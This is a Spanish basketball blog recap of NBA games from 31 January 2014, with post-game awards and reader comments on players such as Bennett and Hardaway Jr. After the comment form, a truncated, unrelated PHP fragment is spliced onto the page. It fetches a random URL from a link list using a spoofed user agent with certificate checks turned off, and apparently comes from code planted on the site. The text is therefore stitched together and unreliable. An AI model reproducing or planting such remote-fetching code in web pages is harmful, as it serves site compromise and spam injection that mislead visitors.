La Crónica: Indiana pincha en Phoenix

31 de January de 2014 por TheDeerHunter

Pues nada. Un equipo diseñado para tanquear, según todos los analistas a principio de curso, ganó cómodamente anoche en Indiana, una de las plazas más difíciles que existen ahora mismo en el panorama NBA. Goran Dragic marcaba la diferencia ante un oponente de entidad como es Lance Stephenson que consiguió un triple-doble. Ninguno de los dos tiene premio de all-star este año. Destacable también la actuación de los hermanos Morris desde el banquillo, así como el apagón de Paul George y todo su equipo desde la larga distancia (102-94).

En el partido a priori estrella de la noche los Warriors le pegaron un buen meneo a un gran rival como son los Clippers. No fue el día de Jamal Crawford y en los angelinos faltaron manos para achicar tantas vías como perforaban los Warriors más colectivos de este curso. Probablemente el mejor partido conjunto de Speights y Barnes para inclinar la balanza de aquel debate que tuvimos al principio de curso por los mejores fondos de armario de la liga. Eso sí, una excepción. Por cierto, gran partido de David Lee que tampoco olerá el all-star (92-111).

En Nueva York hacía tiempo que los lugareños no se daban un homenaje de 4 victorias seguidas. Excelente Carmelo y, por una vez, un J.R. Smith que recuerda a las mejores versiones del año pasado. La mejor noticia de todas fue la inmensa actuación de Tim Hardaway JR. a la altura de las mejores exhibiciones de rookies de la temporada.Los Cavs ni comparecieron. Irving, con cada día más parecidos en lo malo a Iverson, y Waiters fueron los únicos en la brecha (86-117). 

PREMIOS

MVP: Stepehen Curry y David Lee hicieron lo que quisieron con los Clippers. Los 2 anotaron 22 puntos con un 18 de 25 combinado. Goran Dragic se fue a los 28 puntos ante los Pacers.

Rookie: Enorme actuación de Tim Hardaway Jr. que se fue a los 29 puntos que con 29 puntos se convierte en el máximo anotador rookie en un partido.

Sorpresa: Jeremy Tyler aprovecha los minutos que le dan en NY. Si hace un par de días se fue a los 17 puntos, ayer acabó con 8 puntos, 6 rebotes y 2 robos.

Decepción: Jamal Crawford se quedó en un 1 de 9 en TC. Los Clippers le echaron mucho de menos.

Esfuerzo en vano:Lance Stephenson celebró su no inclusión en los equipos del All-Star con un triple doble (14-10-10) y su compañero Roy Hibbert (que sí que irá) se fue a los 26 puntos. Eso sí, no les dio para ganar a los Suns.

Imágenes | AP Photos / Getty Images

Comenta

13 comentarios a esta entrada

  1. Esteban dice:
    #1

    – Enorme temporada de Gracig, y enormes los Suns, no he visto muchos partidos de ellos, asi que a alguien ajeno le es dificil imaginarse un equipo con tan tan poco ganar tanto, Hornaceck se llevara el coach del año no tengo dudas

    – Ayer mire NY Cavs, por curiosidad sobre BENNETT, cuando vi la diferencia abismal en el tanteador, dije bueno, es hora que el chaval salga y se coma la cancha, sean o no minutos basura, necesita toques, punots y mejorar sus registros para su confianza, era una buena oportunidad

    Finalmente me he quedado con un pésimo sabor de boca, BENNETT no esta falto de confianza, simplemente es malo, no se postea, tira a distancia y parece que le da miedo el roce, ayer lo suyo fue patético con 23 minutos basura contra el fondo de armario de los Knicks, cosecho 4 puntos y 2 rebotes, con 1/6 en cancha 2/4 en libres,

    sonrie Kwame Brown, quiza salga de la memoria de muchos para darle paso a BENNETT

      Citar

  2. Esteban dice:
    #2

    sobre bennett, aqui un videito que asusta

      Citar

  3. Gastón dice:
    #3

    Bennett es un desproposito…Pero Mike Brown es peor aun!

      Citar

  4. Denise dice:
    #4

    Esteban:

    – Ayer mire NY Cavs, por curiosidad sobre BENNETT, cuando vi la diferencia abismal en el tanteador, dije bueno, es hora que el chaval salga y se coma la cancha, sean o no minutos basura, necesita toques, punots y mejorar sus registros para su confianza, era una buena oportunidad

    Finalmente me he quedado con un pésimo sabor de boca, BENNETT no esta falto de confianza, simplemente es malo, no se postea, tira a distancia y parece que le da miedo el roce, ayer lo suyo fue patético con 23 minutos basura contra el fondo de armario de los Knicks, cosecho 4 puntos y 2 rebotes, con 1/6 en cancha 2/4 en libres,

    A buenas horas te has enterado de lo pufo que es…
    Aun siendo un paquete, creo que hará una carrera larga de jugar 10-15 minutos y ser un jugador de rotación, lo malo para él es el hecho de haber sido nº1 de un Draft y por tanto tener el foco en su cara siendo un centro de atención. No creo que caiga tan bajo de estar fuera de la NBA dentro de 3 años.

      Citar

  5. Denise dice:
    #5

    La frase “con 29 puntos se convierte en el máximo anotador rookie en un partido” (Tim Hardaway) no entiendo qué habeis querido decir ahí. ¿Podeis explicarlo?
    Por cierto, robazo de los Knicks con este chaval.

    Las temporadas que están haciendo Jarret Jack y Earl Clark, ojo, no sé que porcentaje de culpa tiene el Sr. Brown en esto, pero vaya desperdicio de jugadores.

      Citar

  6. charnes dice:
    #6

    Creo así de memoria que al menos MCW y Oladipo han sobrepasado la treintena…no hicieron un doble tripledoble espectacular el mismo día?

      Citar

  7. Txusma dice:
    #7

    charnes:
    Creo así de memoria que al menos MCW y Oladipo han sobrepasado la treintena…no hicieron un doble tripledoble espectacular el mismo día?

    Dos fails en dos días consecutivos…

    Perdonadme pero lo debo haber entendido yo mal al leer del inglés. Oladipo se fue a los 35 puntos contra los Bulls en aquel partido de las 2 prórrogas, creo recordar y MCW tb ha superado las 30 un par de veces.

    Gracias por el aviso!

      Citar

  8. Ruxixon dice:
    #8

    Se me hace complicado pensar que Bennett sea tan,tan,tan malo.Quiero creer que se han juntado varios factores:la presión del nº1,un entrenador que debe ser nulo para empatizar con sus jugadores -más importante en los rookies-,0 química de equipo…en fin,los Cavaliers.Parece que cuando desearon el mal de LeBron se encontraron con el mal karma de vuelta.

      Citar

  9. Denise dice:
    #9

    El podio de rookies hasta hoy es:
    Oladipo 35 vs Bulls
    Carter-Williams 33 vs Cleveland
    Burke 30 vs Orlando

      Citar

  10. Denise dice:
    #10

    Txusma: Dos fails en dos días consecutivos…

    Oladipo se fue a los 35 puntos contra los Bulls en aquel partido de las 2 prórrogas, creo recordar

    Otro fail. 3 prorrogas.

      Citar

  11. Denise dice:
    #11

    A todo esto….Dante Exum se declara elegible para el Draft, siendo creo, el primer pez gordo en hacerlo.

      Citar

  12. Melo15 dice:
    #12

    Para mi es un gran error no pasar por la universidad, al menos para comparar tus habilidades con los mejores.
    Supongo que teme bajar su status aunque puede que algun GM se eche para atras por miedo a que le salga rana una eleccion en este Draft.
    Sobre Bennet a mi como jugador me encantaba, lo vi en la universidad y era un ciclon en ataque.
    Lo vi ayer contra los Knicks y ha perdido mucha velocidad y explosion, sus movimientos son lentos y hasta perezosos y juega sin una ganas. Veremos pero yo creo que acabara siendo un buen suplente anotador en algun equipo.

      Citar

  13. Ruxixon dice:
    #13

    A Exum lo único que le puede perjudicar es estar todo este tiempo sin competir.Por otro lado,no me preocuparía de no pasar por la ncaa cuando ha conseguido todo ese hype sin pisar una cancha universitaria americana.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>